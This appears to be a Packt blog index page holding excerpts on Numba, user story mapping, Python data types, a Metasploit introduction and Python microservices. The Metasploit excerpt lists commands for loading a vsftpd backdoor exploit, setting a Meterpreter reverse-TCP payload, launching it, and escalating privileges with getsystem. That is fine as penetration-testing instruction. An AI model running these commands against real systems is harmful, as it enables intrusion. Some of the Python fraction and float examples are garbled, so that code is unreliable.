the layout string is completely arbitrary; you may choose to use k  or other letters of your liking. Also, if you want to combine arrays of uneven sizes, you can use layouts strings, such as (n, m). Our brand new euclidean function can be conveniently used on arrays of different shapes, as shown in the following example: a = np.random.rand(2) b = np.random.rand(2) c = euclidean(a, b) # Shape: (1,) a = np.random.rand(10, 2) b = np.random.rand(10, 2) c = euclidean(a, b) # Shape: (10,) a = np.random.rand(10, 2) b = np.random.rand(2) c = euclidean(a, b) # Shape: (10,) How does the speed of euclidean compare to standard NumPy? In the following code, we benchmark a NumPy vectorized version with our previously defined euclidean function: a = np.random.rand(10000, 2) b = np.random.rand(10000, 2) %timeit ((a - b)**2).sum(axis=1) 1000 loops, best of 3: 288 µs per loop %timeit euclidean(a, b) 10000 loops, best of 3: 35.6 µs per loop The Numba version, again, beats the NumPy version by a large margin! Summary Numba is a tool that compiles fast, specialized versions of Python functions at runtime. In this article, we learned how to compile, inspect, and analyze functions compiled by Numba. We also learned how to implement fast NumPy universal functions that are useful in a wide array of numerical applications.  Tools such as PyPy allow us to run Python programs unchanged to obtain significant speed improvements. We demonstrated how to set up PyPy, and we assessed the performance improvements on our particle simulator application. Resources for Article: Further resources on this subject: Getting Started with Python Packages [article] Python for Driving Hardware [article] Python Data Science Up and Running [article]
Read more
  • 0
  • 0
  • 12993

Packt
23 Jun 2017
18 min read
Save for later

User Story Map – The First User Experience Map in a Product’s Life

Packt
23 Jun 2017
18 min read
In this article by Peter W. Szabo, the author of the book User Experience Mapping we will explore the idea of how to start with predictive analysis. In this User story maps solve the user's problems in form of a discussion. Your job as a product manager or user experience consultant should be to make the world better through user-centric products. Essentially solving the user's problems. Contrary to popular belief, user story maps are not just cash cows for agile experts. They will help a product to succeed, by increasing their understanding of the system. Not just what's inside it, but what will happen to the world as a result. By focusing on the opportunity and outcomes the team can prioritize development. In reality, this often means stopping the proliferation of features, andunderdoing your competition. Wait a minute, did you just read underdoing? As in, fewer features, not making bold promises and significantly less customizability and options? Yes indeed. The founders of Basecamp (formerly 37 signals) are the champions of building less. In their bookReWork: Change the Way You Work Foreverthey tell Basecamp's success story while giving vital advice to anyone trying to run a build a product or a startup: “When things aren't working, the natural inclination is to throw more at the problem. More people, time, and money. All that ends up doing is making the problem bigger. The right way to go is the opposite direction: Cut back. So do less. Your project won't suffer nearly as much as you fear. In fact, there's a good chance it'll end up even better.” (Jason Fried) User Story Maps will help you to throw less at the problem, chopping down extras, until you reach an awesome product, which is actually done.One of the problems with long product backlogs or nightmarish requirement documents is that it never gets done. Literally never. Once I had to work on improving the user experience of a bank's backend. It was a gargantuan task, as this backend was a large collection of distributed microservices, which meant hundreds of different forms with hard to understand functions and a badly designed multi-level menu which connected them together. I knew almost nothing about banking, and they knew almost nothing about UX, so this was a match made in heaven. They gave me a twelve-page document. That was just the non-disclosure agreement. The project had many 100+ page documents, detailing various things and how they are done, complete with business processes and banking jargon. They wanted us to compile an expert review on what needs to be redesigned and create a detailed strategy for that. I found a better use of their money than wasting time on expert reviews and redesign strategies at that stage. Recording or even watching bank employees, while they used the system during their work was out of the question. So we went for the quick win and did user story mapping in the first week of the project. Among the attendees of the user story mapping sessions, therewerea few non-manager level bank employees, who used the backend extensively. One of them was quite new to her job, but fortunately, quite talkative about it. It was immediately evident that most employees almost never used at least 95% of the functionality. Those were reserved for specially trained people, usually managers. After creating the user story map with the most essential and frequently used features, I suggested a backend interface, which only contained about 1% of the functionality of the old system at first, with the mention of other features to be added later. (As a UX consultant you should avoid saying no, instead try saying later. It has the same effect for the project but keeps everyone happy.) No one in the room believed that such a crazy idea would go through senior management, although they supported the proposal. Quite the contrary, it did go extremely well with senior management. The senior managers understood, that by creating a simple and fast backend user interface, they will be able to reduce the queues without hiring new employees. Moreover, if they need to hire people, training will be easier and faster. The new UI could also reduce the number of human errors. Almost all of the old backend was still online two years later, although used only by a few employees. This made both the product and the information security team happy, not to mention HR. The functionality of the new application extended only slightly in 24 months. Nobody complained and the bank's customers were happy with smaller queues. All this was achieved with a pack of colored sticky notes, some markers and much more importantly a discussion and shared understanding. This is just one example, how a simple technique, like user story mapping, could save millions of dollars for a company. (For more resources related to this topic, see here.) Just tell the story Drawing a map, any map will lead to solving the problem. User story maps aim to replace document hand-overs with discussions and collaboration. Enterprises tend to have some sort of formal approval process, usually with a sign-off. That's perfectly fine, and most of the time unavoidable. Just make sure, that the sign-off happens after the mapping and story discussions. Ideally, right after the discussion, not days or weeks later. There is a reason why product manager, UX experts and all stakeholders love stories: they are humans. As such, we all have a natural tendency to love an emotionally satisfying tale. Most of our entertainment revolves around stories, and we want to hear good stories. A great story revolves around conflicts in a memorable and exciting way. How to tell a story? Telling a story is an easy task. We all did that as kids, yet we tend to forget about that skill we possess when we get into a serious product management discussion. How to tell a great story? There are a few rules to consider, the most important one is that you should talk about something that captivates the audience. The audience You should focus on the audience. What are their problems? What would make them listen actively, instead of texting or catching Pokémon, while at a user story discussion? Even if the project is about scratching your own itch, you should spin the story so it's their itch that is scratched. Engaging the audience can be indeed a challenge. Once upon atimeI have written a sci-fi novel. Actually, it was published in 2000, with the title Tűzsugár, in Hungarian.The English title would be Ray of Fire, but fortunately for my future writing career, it was never translated into English. The bookhad everything my 15-16 years old self consideredfun: For instance a great space war or passionate love between members of different sapient spacefaring races. The characters were miscellaneous human and non-human life-forms stuck in a spaceship for most of the story. Some of my characters had a keen resemblance to miscellaneous video-game characters, from games like Mortal Kombat 2 or Might & Magic VI. They certainly lacked emotional struggles over insignificant things like mass-murder or the end of the universe. As I certainly hope you will never read that book, I will spoiler you the end. A whole planet died, hinting that the entire galaxy might share the same fate, with a faint hope for salvation. This could have led to a sequel, but fortunately for all sci-fi lovers, I stopped writing the sequel after nine chapters. The book seemed to be a success. A national TV channel made an interview with me, if that’s any measure of success. More importantly, I had lots of fun writing it. But the book itself was hard to understand and probably impossible to appreciate. My biggest mistake was writing only what I considered fun. To be honest, I still write for fun, but now Ihave an audience in mind. I tell the story of my passion for user experience mapping to a great audience: you. I try to find things that are fun to write and still interesting to my target audience. As a true UX geek, I create the main persona of my audience before writing anything and tell a story to her. This article’s main persona is called Maya, and she shares many traits with my daughter. Could I say, I'm writing this book to my daughter? Of course, I do, but I keep in mind all otherpersonas. Hopefully one of them is a bit like you. Before a talk at a conference, I always ask the organizers about the audience. Even if the topic stays the same, the audience completely changes the story and the way I present it. I might tell the same user story differently to one of my team members, to the leader of another team, or to a chief executive. Differently internally, to a client or a third party. When telling a story, contrary to a written story, you will see an immediate feedback or the lack of it from your audience. You should go even further and shape the story based on this feedback. Telling a story is an interactive experience. Engage with the audience. Ask them questions, and let them ask you questions as a start, then turn this into a shared storytelling experience, where the story is being told by all participants together (not at the same time, though, unless you turn the workshop into a UX carol). When you tell a fairy-tale to your daughter, she might ask you why can't theprincessescape using her sharp wits and cunning, instead of relying on a prince challenging the dragon to a bloody duel. (Then you might start appreciating the story of the My Little Pony where the girl ponies solve challenges mostly non-violently while working together as a team of friends, instead of acting as a prize to be won.) So why not spin a tale of heroic princesses with fluffy pink cats?   Start with action Beginningin medias res, as in starting the narrative in the midst of action is a technique used by masters, such as Shakespeare or Homer, and it is also a powerful tool in your user story arsenal. While telling a story, always try to add as little background as possible, and start with drama or something to catch the attention of the audience, whenever possible. At the beginning of TheOdyssey quite a few unruly men want to marry Telemachus' mother, while his father has still not returned home from the Trojan War. There is no lengthy introduction explaining how those men ended up in Ithaca, or why the goddess, flashing-eyed Athena cares about Odysseus. The poem was composed in an oral tradition and was more likely to be heard thanreadat the time of composition. While literacy skyrocketed since Homer's time, you want to tell and discuss your user stories. Therefore you should consider a similar start. (Maybe not mentioning the user's mother or her rascally suitors.) Simplify In literary fiction, a complex story can be entertaining. A Game of Thrones and its sequels inA Song of Ice and Fireseries is a good example for that. The thing is, George R. R. Martin writes those novels, and he certainly has no intention to discuss them during sprint planning meetings with stakeholders. User Story Maps are more similar to sagas, folktales and other stories formed in an oral tradition. They develop in a discussion, and their understandability is granted by their simplicity. We need to create a map as simple and small as possible, with as few story cards as possible. So how big should the story map be? Jim Shore definesstory card hell as something that happens when you have 300 story cards and you have to keep track of them. Madness, huh? This is not Sparta! Sorry Jim for the bad pun, but you are absolutely right, in the 300 range, you will not understand the map, and the whole discussion part will completely fail. The user stories will be lost, and the audience will not even try to understand what's happening. There is no ideal number of cards in a story map but aim low. Then eliminate most of the cards. Clutter will destroy the conversation. In most card games you will have from two to seven cards in hand, with some rare exceptions. The most popular card game both online and offline is Texas Hold 'em Poker. In that game, each player is dealt only two cards. This is because human thought processes and discussions work best with a small number of objects. Sometimes the number of objects in the real world is high. Our mind is good at simplifying, classifying and grouping things into manageable units. With that said, most books and conference presentations about user story mapping show us a photo of a wall covered with sticky notes. The viewer will have absolutely no idea what's on them, but one thing is certain, it looks like acomplex project. I have a bad news for you: projects with a complex user story map never get finished, and if they do get finished to a degree they will fail. The abundance of sticky notes means that the communication and simplification process needs one or more iterations. Throw away most of the sticky notes! To do that, you need to understand the problem better. Tell the story of your passion Seriously. Find someone, and tell her the user story of the next big thing. The app or hardware which will change the world. Try it now. Be bold and let your imagination flow. I believe that in this century we will be able to digitalize human beings. This will be the key to both humankind's survival as a species and our exploration of the space. The digital society would have no famine, no plagues and no poverty. This would solve all major problems we face today. Digital humans would even defeat death. Sounds like a wild sci-fi idea? It is, but then again, smartphones were also a wild sci-fi idea a few decades ago. Now I will tell you the story of something we can build today. The grocery surplus webshop We will create the user story map for a grocery surplus webshop. Using this eCommerce site, we will sell clearancefood and drink at a discount price. This means food, that would be thrown away at a regular store. For example food past its expiry date or with damaged packaging.This idea is popular in developed countries, like Denmark or the UK, and it might help cutting down on the amounts of food wasted every year, totaling 1.3 billion metric tonnes worldwide. We are trying to create the online-only version of WeFood (https://donate.danchurchaid.org/wefood). Our users can be environmentally conscious shoppers or low-income families with limited budgets just to give two examples. In this article I will not introduce personas, and treat them separately, so for now, we will only think about them as shoppers. The opportunity to scratch your own itch Mapping will help you to achieve the most, with as little as possible. In other words: maximize the opportunity, while minimizing the outputs. To use the mapping lingo: The outputs are products of the map’s usage, while the outcomes are the results. The opportunity is the desired outcome we plan to achieve with the aid of the map. This is how we want to change the world. We should start the map with the opportunity. The opportunity should not be defined as selling surplus food and drink to our visitors. If you approach a project or a business without solving the users' problem the project might become a failure. The best way to find out what our user want is through valid user research, remote and lab-based user experience testing. Sometimes we need to settle with the second best solution, which happens to be free. That’ssolving your own problem, in other words,scratch your own itch. Probably the best summary of this mantra comes from Jason Fried, the founder and CEO of Basecamp: “When you solve your own problem, you create a tool that you're passionate about. And passion is key. Passion means you'll truly use it and care about it. And that's the best way to get others to feel passionate about it too.” (Getting Real: The Smarter, Faster, Easier Way to Build a Successful Web Application) We will create the web store we would love to use. Although, as the cliché goes, there is noI inteam, but there is certainly an I inwriter. My ideal eCommerce site could be different to yours. When following the examples of this article, please try to think of your itch, your ideal web store, and use my words only as guidance. You can create the user story map for any other project, ideally something you are passionate about. I would encourage you to pick something that's not a webshop, or maybe not even a digital product if you feel adventurous. You need the tell the story of your passion. (No, not that passion. This is not an adults-only website.) My passion is reducing food waste (that's also the poor excuse I'm using when looking at the bathroom scale). Here is my attempt to phrase the opportunity. The opportunity: Our shoppers want to save money while reducing global food waste. They understand and accept what surplus food and drink means, and they are happy to shop with us. Actually, the first sentence would be enough. Remember, you want to have a simple one or two sentence opportunity definition. I ended up working for two tapestry web shops as a consultant. Not at the same time, though, and the second company approached me mostly as the result of how successful the first one was. It's a relatively small industry in Europe, and business owners and decision-makers know each other by name. I still recall the pleasant experience I had meeting the owners of the first web shop. They invited me to dinner at a homely restaurant in Budapest.We had a great discussion and they shared their passion. They were an elderly couple, so they must have spent most of their life in the communist era. In the early 90's they decided to start a business, selling tapestry in a brick and mortar store. Obviously, they had no background in management or running acapitalist business, but that didn't matter, they only wanted to help people to make their homes beautiful. They loved tapestry, so they started importing and selling it. When I visited their physical store I have seen them talking to a customer. They spent more than an hour discussing interior decoration with someone, who just popped by to ask the square meter prices of tapestry. Tapestry is not sold per square meter, but they did the math for the customer among many other things. They showed her many different patterns, types and discussed application methods. After leaving the shop the customer knew more about tapestry than most other people ever will. Fast forward to the second contract. I only talked to the client on Skype, and that's perfectly fine because most of my clients don't invite me to dinner. I saw many differences in this client's approach to the previous one. At some point, I asked him “Why do you sell tapestry? Is tapestry your passion?” He was a bit startled by the question, but he promptly replied: “To make money, why else? You need to be pretty crazy to have tapestry as a passion.” Seven years later the second business no longer exists, yet the first one is still successful. Treating your work as your passion works wonders. Passion is an important contributor to the success of an idea. Whenever possible, pour your passion into a product and summarize it as the opportunity. What’s next? If you buy my new book, User Experience Mapping, you will find more about user story maps in the second chapter. In that chapter, we will explore user story maps, and how they help you to create requirements through collaboration (and a few sticky notes): We will create user stories and arrange them as a user story map. We will discuss the reasons behind creating them. We will learn how to tell a story. The grocery surplus webshop's user story map will be the example I will create in this chapter. To do this, we will explore user story templates, characteristics of a good user story (INVEST) and epics. With the 3 Cs (Card, Conversation and Confirmation) process we will turn the stories into reality. We will create a user story map on a wall with sticky notes Then digitally using StoriesOnBoard. And that’s just the second chapter, each of the eleven chapters contains different user experience maps. The book reveals two advanced mapping techniques for the first time in print, the behavioural change map and the 4D UX map. You will also explore user story maps, task models and journey maps. You will create wireflows, mental model maps, ecosystem maps and solution maps. In this book, we will show you how to use insights from real users to create and improve your maps and your product. Start mapping your products now to change your users’ lives! Resources for Article: Further resources on this subject: Learning D3.js Mapping Data Acquisition and Mapping Creating User Interfaces
Read more
  • 0
  • 0
  • 933

article-image-inbuilt-data-types-python
Packt
22 Jun 2017
4 min read
Save for later

Inbuilt Data Types in Python

Packt
22 Jun 2017
4 min read
This article by Benjamin Baka, author of the book Python Data Structures and Algorithm, explains the inbuilt data types in Python. Python data types can be divided into 3 categories, numeric, sequence and mapping. There is also the None object that represents a Null, or absence of a value. It should not be forgotten either that other objects such as classes, files and exceptions can also properly be considered types, however they will not be considered here. (For more resources related to this topic, see here.) Every value in Python has a data type. Unlike many programming languages, in Python you do not need to explicitly declare the type of a variable. Python keeps track of object types internally. Python inbuilt data types are outlined in the following table: Category Name Description None None The null object Numeric int Integer   float Floating point number   complex Complex number   bool Boolean (True, False) Sequences str String of characters   list List of arbitrary objects   Tuple Group of arbitrary items   range Creates a range of integers. Mapping dict Dictionary of key – value pairs   set Mutable, unordered collection of unique items   frozenset Immutable set None type The None type is immutable and has one value, None. It is used to represent the absence of a value. It is returned by objects that do not explicitly return a value and evaluates to False in Boolean expressions. It is often used as the default value in optional arguments to allow the function to detect if the caller has passed a value. Numeric Types All numeric types, apart from bool, are signed and they are all immutable. Booleans have two possible values, True and False. These values are mapped to 1 and 0 respectively. The integer type, int, represents whole numbers of unlimited range. Floating point numbers are represented by the native double precision floating point representation of the machine. Complex numbers are represented by two floating point numbers. they are assigned using the j operator to signify the imaginary part of the complex number. For example : a = 2+3j We can access the real and imaginary parts by a.real and a.imag respectively. Representation error It should be noted that the native double precision representation of floating point numbers leads to some unexpected results. For example, consider the following: In[14]: 1-0.9 Out[14]: 0.09999999999998 In [15]: 1-0.9 == 0.1 Out[15]: False This is a result of the fact that most decimal fractions are not exactly representable as a binary fraction, which is how most underlying hardware represents floating point numbers. For algorithms or applications where this may be an issue Python provides a decimalmodule. This module allows for the exact representation of decimal numbers and facilitates greater control properties such as rounding behaviour, number of significant digits and precision. It defines two objects, a Decimal type, representing decimal numbers and a Context type, representing various computational parameters such as precision, rounding and error handling.  An example of its usage can be seen in the following: In [1]: import decimal In[2]: x = decimal.Decimal(3.14); y=decimal.Decimal(2.74) In[3]: x*y Out[3]: Decimal (‘8.60360000000001010036498883’) In[4]: decimal.getcontext().prec = 4 In[5]: x * y Out[5]: Decimal(‘8.604’) Here we have created a global context and set the precision to 4. The Decimal object can be treated pretty much as you would treat an int or a float. They are subject to all the same mathematical operations and can be used as dictionary keys, placed in sets and so on. In addition, Decimal objects also have several methods for mathematical operations such as natural exponents x.exp(), natural logarithms, x.ln() and base 10 logarithms, x.log10().  Python also has a fractions module that implements a rational number type. The following shows several ways to create fractions: In [62]: import fractions In [63]: fractions Fraction(3,4) #creates the fraction ¾ Out[63]: Fraction(3,4) In [64]: fraction Fraction(0,5) #creates a fraction from a float Out[64]: Fraction(1,2) In [65]: fraction Fraction(“.25”) #creates a fraction from a string Out[65]: Fraction(1,4) It is also worth mentioning here the NumPy extension. This has types for mathematical objects such as arrays, vectors and matrixes and capabilities for linear algebra, calculation of Fourier transforms, eigenvectors, logical operations and much more. Summary We have looked at the built in data types and some internal Python modules, most notable the collections module. There are a number of external libraries such as the SciPy stack, and, likewise.  Resources for Article: Further resources on this subject: Python Data Structures [article] Getting Started with Python Packages [article] An Introduction to Python Lists and Dictionaries [article]
Read more
  • 0
  • 0
  • 2412
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at €18.99/month. Cancel anytime
article-image-getting-started-metasploit
Packt
22 Jun 2017
10 min read
Save for later

Getting Started with Metasploit

Packt
22 Jun 2017
10 min read
In this article by Nipun Jaswal, the author of the book Metasploit Bootcamp, we will be covering the following topics: Fundamentals of Metasploit Benefits of using Metasploit (For more resources related to this topic, see here.) Penetration testing is an art of performing a deliberate attack on a network, web application, server or any device that require a thorough check up from the security perspective. The idea of a penetration test is to uncover flaws while simulating real world threats. A penetration test is performed to figure out vulnerabilities and weaknesses in the systems so that vulnerable systems can stay immune to threats and malicious activities. Achieving success in a penetration test largely depends on using the right set of tools and techniques. A penetration tester must choose the right set of tools and methodologies in order to complete a test. While talking about the best tools for penetration testing, the first one that comes to mind is Metasploit. It is considered as one of the most practical tools to carry out penetration testing today. Metasploit offers a wide variety of exploits, a great exploit development environment, information gathering and web testing capabilities, and much more. The fundamentals of Metasploit Now that we have completed the setup of Kali Linux let us talk about the big picture: Metasploit. Metasploit is a security project that provides exploits and tons of reconnaissance features to aid a penetration tester. Metasploit was created by H.D Moore back in 2003, and since then, its rapid development has led it to be recognized as one of the most popular penetration testing tools. Metasploit is entirely a Ruby-driven project and offers a great deal of exploits, payloads, encoding techniques, and loads of post-exploitation features. Metasploit comes in various editions, as follows: Metasploit pro: This edition is a commercial edition, offers tons of great features such as web application scanning and exploitation, automated exploitation and is quite suitable for professional penetration testers and IT security teams. Pro edition is used for advanced penetration tests and enterprise security programs. Metasploit express: The Express edition is used for baseline penetration tests. Features in this version of Metasploit include smart exploitation, automated brute forcing of the credentials, and much more. This version is quite suitable for IT security teams to small to medium size companies. Metasploit community: This is a free version with reduced functionalities of the express edition. However, for students and small businesses, this edition is a favorable choice. Metasploit framework: This is a command-line version with all manual tasks such as manual exploitation, third-party import, and so on. This release is entirely suitable for developers and security researchers. You can download Metasploit from the following link: https://www.rapid7.com/products/metasploit/download/editions/ We will be using the Metasploit community and framework version.Metasploit also offers various types of user interfaces, as follows: The graphical user interface(GUI): This has all the options available at a click of a button. This interface offers a user-friendly interface that helps to provide a cleaner vulnerability management. The console interface: This is the most preferred interface and the most popular one as well. This interface provides an all in one approach to all the options offered by Metasploit. This interface is also considered one of the most stable interfaces. The command-line interface: This is the more potent interface that supports the launching of exploits to activities such as payload generation. However, remembering each and every command while using the command-line interface is a difficult job. Armitage: Armitage by Raphael Mudge added a neat hacker-style GUI interface to Metasploit. Armitage offers easy vulnerability management, built-in NMAP scans, exploit recommendations, and the ability to automate features using the Cortanascripting language. Basics of Metasploit framework Before we put our hands onto the Metasploit framework, let us understand basic terminologies used in Metasploit. However, the following modules are not just terminologies but modules that are heart and soul of the Metasploit project: Exploit: This is a piece of code, which when executed, will trigger the vulnerability at the target. Payload: This is a piece of code that runs at the target after a successful exploitation is done. It defines the type of access and actions we need to gain on the target system. Auxiliary: These are modules that provide additional functionalities such as scanning, fuzzing, sniffing, and much more. Encoder: Encoders are used to obfuscate modules to avoid detection by a protection mechanism such as an antivirus or a firewall. Meterpreter: This is a payload that uses in-memory stagers based on DLL injections. It provides a variety of functions to perform at the target, which makes it a popular choice. Architecture of Metasploit Metasploit comprises of various components such as extensive libraries, modules, plugins, and tools. A diagrammatic view of the structure of Metasploit is as follows: Let's see what these components are and how they work. It is best to start with the libraries that act as the heart of Metasploit. Let's understand the use of various libraries as explained in the following table: Library name Uses REX Handles almost all core functions such as setting up sockets, connections, formatting, and all other raw functions MSF CORE Provides the underlying API and the actual core that describes the framework MSF BASE Provides friendly API support to modules We have many types of modules in Metasploit, and they differ regarding their functionality. We have payload modules for creating access channels to exploited systems. We have auxiliary modules to carry out operations such as information gathering, fingerprinting, fuzzing an application, and logging into various services. Let's examine the basic functionality of these modules, as shown in the following table: Module type Working Payloads Payloads are used to carry out operations such as connecting to or from the target system after exploitation or performing a particular task such as installing a service and so on. Payload execution is the next step after the system is exploited successfully. Auxiliary Auxiliary modules are a special kind of module that performs specific tasks such as information gathering, database fingerprinting, scanning the network to find a particular service and enumeration, and so on. Encoders Encoders are used to encode payloads and the attack vectors to (or intending to) evade detection by antivirus solutions or firewalls. NOPs NOP generators are used for alignment which results in making exploits stable. Exploits The actual code that triggers a vulnerability Metasploit framework console and commands Gathering knowledge of the architecture of Metasploit, let us now run Metasploit to get a hands-on knowledge about the commands and different modules. To start Metasploit, we first need to establish database connection so that everything we do can be logged into the database. However, usage of databases also speeds up Metasploit's load time by making use of cache and indexes for all modules. Therefore, let us start the postgresql service by typing in the following command at the terminal: root@beast:~# service postgresql start Now, to initialize Metasploit's database let us initialize msfdb as shown in the following screenshot: It is clearly visible in the preceding screenshot that we have successfully created the initial database schema for Metasploit. Let us now start the Metasploit's database using the following command: root@beast:~# msfdb start We are now ready to launch Metasploit. Let us issue msfconsole in the terminal to startMetasploit as shown in the following screenshot: Welcome to the Metasploit console, let us run the help command to see what other commands are available to us: The commands in the preceding screenshot are core Metasploit commands which are used to set/get variables, load plugins, route traffic, unset variables, printing version, finding the history of commands issued, and much more. These commands are pretty general. Let's see module based commands as follows: Everything related to a particular module in Metasploit comes under module controls section of the Help menu. Using the preceding commands, we can select a particular module, load modules from a particular path, get information about a module, show core, and advanced options related to a module and even can edit a module inline. Let us learn some basic commands in Metasploit and familiarize ourselves to the syntax and semantics of these commands: Command Usage Example use [auxiliary/exploit/payload/encoder] To select a particular msf>use exploit/unix/ftp/vsftpd_234_backdoor msf>use auxiliary/scanner/portscan/tcp show[exploits/payloads/encoder/auxiliary/options] To see the list of available modules of a particular type msf>show payloads msf> show options set [options/payload] To set a value to a particular object msf>set payload windows/meterpreter/reverse_tcp msf>set LHOST 192.168.10.118 msf> set RHOST 192.168.10.112 msf> set LPORT 4444 msf> set RPORT 8080 setg [options/payload] To assign a value to a particular object globally, so the values do not change when a module is switched on msf>setgRHOST 192.168.10.112 run To launch an auxiliary module after all the required options are set msf>run exploit To launch an exploit msf>exploit back To unselect a module and move back msf(ms08_067_netapi)>back msf> Info To list the information related to a particular exploit/module/auxiliary msf>info exploit/windows/smb/ms08_067_netapi msf(ms08_067_netapi)>info Search To find a particular module msf>search hfs check To check whether a particular target is vulnerable to the exploit or not msf>check Sessions To list the available sessions msf>sessions [session number]   Meterpreter commands Usage Example sysinfo To list system information of the compromised host meterpreter>sysinfo ifconfig To list the network interfaces on the compromised host meterpreter>ifconfig meterpreter>ipconfig (Windows) Arp List of IP and MAC addresses of hosts connected to the target meterpreter>arp background To send an active session to background meterpreter>background shell To drop a cmd shell on the target meterpreter>shell getuid To get the current user details meterpreter>getuid getsystem To escalate privileges and gain system access meterpreter>getsystem getpid To gain the process id of the meterpreter access meterpreter>getpid ps To list all the processes running at the target meterpreter>ps If you are using Metasploit for the very first time, refer to http://www.offensive-security.com/metasploit-unleashed/Msfconsole_Commandsfor more information on basic commands Benefits of using Metasploit Metasploit is an excellent choice when compared to traditional manual techniques because of certain factors which are listed as follows: Metasploit framework is open source Metasploit supports large testing networks by making use of CIDR identifiers Metasploit offers quick generation of payloads which can be changed or switched on the fly Metasploit leaves the target system stable in most of the cases The GUI environment provides a fast and user-friendly way to conduct penetration testing Summary Throughout this article, we learned the basics of Metasploit. We learned about various syntax and semantics of Metasploit commands. We also learned the benefits of using Metasploit. Resources for Article: Further resources on this subject: Approaching a Penetration Test Using Metasploit [article] Metasploit Custom Modules and Meterpreter Scripting [article] So, what is Metasploit? [article]
Read more
  • 0
  • 0
  • 17382

article-image-understanding-microservices
Packt
22 Jun 2017
19 min read
Save for later

Understanding Microservices

Packt
22 Jun 2017
19 min read
This article by Tarek Ziadé, author of the book Python Microservices Development explains the benefits and implementation of microservices with Python. While the microservices architecture looks more complicated than its monolithic counterpart, its advantages are multiple. It offers the following benefits. (For more resources related to this topic, see here.) Separation of concerns First of all, each microservice can be developed independently by a separate team. For instance, building a reservation service can be a full project on its own. The team in charge can make it in whatever programming language and database, as long as it has a well-documented HTTP API. That also means the evolution of the app is more under control than with monoliths. For example, if the payment system changes its underlying interactions with the bank, the impact is localized inside that service and the rest of the application stays stable and under control. This loose coupling improves a lot the overall project velocity as we're applying at the service level a similar philosophy than the single responsibility principle. The single responsibility principle was defined by Robert Martin to explain that a class should have only one reason to change - in other words, each class should be providing a single, well-defined feature. Applied to microservices, it means that we want to make sure that each microservice focuses on a single role. Smaller projects The second benefit is breaking the complexity of the project. When you are adding a feature to an application like the PDF reporting, even if you are doing it cleanly, you are making the base code bigger, more complicated and sometimes slower. Building that feature in a separate application avoids this problem, and makes it easier to write it with whatever tools you want. You can refactor it often and shorten your release cycles, and stay on the top of things. The growth of the application remains under your control. Dealing with a smaller project also reduces risks when improving the application: if a team wants to try out the latest programming language or framework, they can iterate quickly on a prototype that implements the same microservice API, try it out, and decide whether or not to stick with it. One real-life example in mind is the Firefox Sync storage microservice. There are currently some experiments to switch from the current Python+MySQL implementation to a Go based one that stores users data in standalone SQLite databases. That prototype is highly experimental, but since we have isolated the storage feature in a microservice with a well-defined HTTP API, it's easy enough to give it a try with a small subset of the user base. Scaling and deployment Last, having your application split into components makes it easier to scale depending on your constraints. Let's say you are starting to get a lot of customers that are booking hotels daily, and the PDF generation is starting to heat up the CPUs. You can deploy that specific microservice in some servers that have bigger CPUs. Another typical example is RAM-consuming microservices like the ones that are interacting with memory databases like Redis or Memcache. You could tweak your deployments consequently by deploying them on servers with less CPU and a lot more RAM. To summarize microservices benefits: A team can develop each microservice independently, and use whatever technological stack makes sense. They can define a custom release cycle. The tip of the iceberg is its language agnostic HTTP API. Developers break the application complexity into logical components. Each microservice focuses on doing one thing well. Since microservices are standalone applications, there's a finer control on deployments, which makes scaling easier. Microservices architectures are good at solving a lot of the problems that may arise once your application is starting to grow. Although, we need to be aware of some of the new issues they also bring in practice. Implementing microservices with Python Python is an amazingly versatile language. As you probably already know, it's used to build many different kinds of applications, from simple system scripts that perform tasks on a server, to large object-oriented applications that run services for millions of users. According to a study conducted by Philip Guo in 2014, published in the Association for Computing Machinery (ACM) website, Python has surpassed Java in top U.S. universities and is the most popular language to learn Computer Science. This trend is also true in the software industry. Python sits now in the top 5 languages in the TIOBE index (http://www.tiobe.com/tiobe-index/), and it's probably even bigger in the web development land since languages like C are rarely used as main languages to build web applications. However, some developers criticize Python for being slow and unfit for building efficient web services. Python is slow, and this is undeniable. But it's still is a language of choice for building microservices, and many major companies are happily using it. This section will give you some background on the different ways you can write microservices using Python, some insights on asynchronous versus synchronous programming, and conclude with some details on Python performances. It's composed of 4 parts: The WSGI standard Greenlet & Gevent Twisted & Tornado asyncio Language performances The WSGI standard What strikes the most web developers that are starting with Python is how easy it is to get a web application up and running. The Python web community has created a standard inspired from the Common Gateway Interface (CGI) called Web Server Gateway Interface (WSGI) that simplifies a lot how you can write a Python application which goal is to serve HTTP requests. When your code is using that standard, your project can be executed by standard web servers like Apache or NGinx, using WSGI extensions like uwsgi or mod_wsgi. Your application just has to deal with incoming requests and send back JSON responses, and Python includes all that goodness in its standard library. You can create a fully functional microservice that returns the server's local time with a vanilla Python module of fewer than ten lines: import JSON import time def application(environ, start_response): headers = [('Content-type', 'application/json')] start_response('200 OK', headers) return bytes(json.dumps({'time': time.time()}), 'utf8') Since its introduction, the WSGI protocol became an essential standard and the Python web community widely adopted it. Developers wrote middlewares, which are functions you can hook before or after the WSGI application function itself, to do something within the environment. Some web frameworks were created specifically around that standard, like Bottle (http://bottlepy.org) - and soon enough, every framework out there could be used through WSGI in a way or another. The biggest problem with WSGI though is its synchronous nature. The application function you see above is called exactly once per incoming request, and when the function returns, it has to send back the response. That means that every time you are calling the function, it will block until the response is ready. And writing microservices means your code will be waiting for responses from various network resources all the time. In other words, your application will idle and just block the client until everything is ready. That's an entirely okay behavior for HTTP APIs. We're not talking about building bidirectional applications like web socket based ones. But what happens when you have several incoming requests that are calling your application at the same time? WSGI servers will let you run a pool of threads to serve several requests concurrently. But you can't run thousands of them, and as soon as the pool is exhausted, the next request will be blocking even if your microservice is doing nothing but idling and waiting for backend services responses. That's one of the reasons why non-WSGI frameworks like Twisted, Tornado and in Javascript land Node.js became very successful - it's fully async. When you're coding a Twisted application, you can use callbacks to pause and resume the work done to build a response. That means you can accept new requests and start to treat them. That model dramatically reduces the idling time in your process. It can serve thousands of concurrent requests. Of course, that does not mean the application will return each single response faster. It just means one process can accept more concurrent requests and juggle between them as the data is getting ready to be sent back. There's no simple way with the WSGI standard to introduce something similar, and the community has debated for years to come up with a consensus - and failed. The odds are that the community will eventually drop the WSGI standard for something else. In the meantime, building microservices with synchronous frameworks is still possible and completely fine if your deployments take into account the one request == one thread limitation of the WSGI standard. There's, however, one trick to boost synchronous web applications: greenlets. Greenlet & Gevent The general principle of asynchronous programming is that the process deals with several concurrent execution contexts to simulate parallelism. Asynchronous applications are using an event loop that pauses and resumes execution contexts when an event is triggered - only one context is active, and they 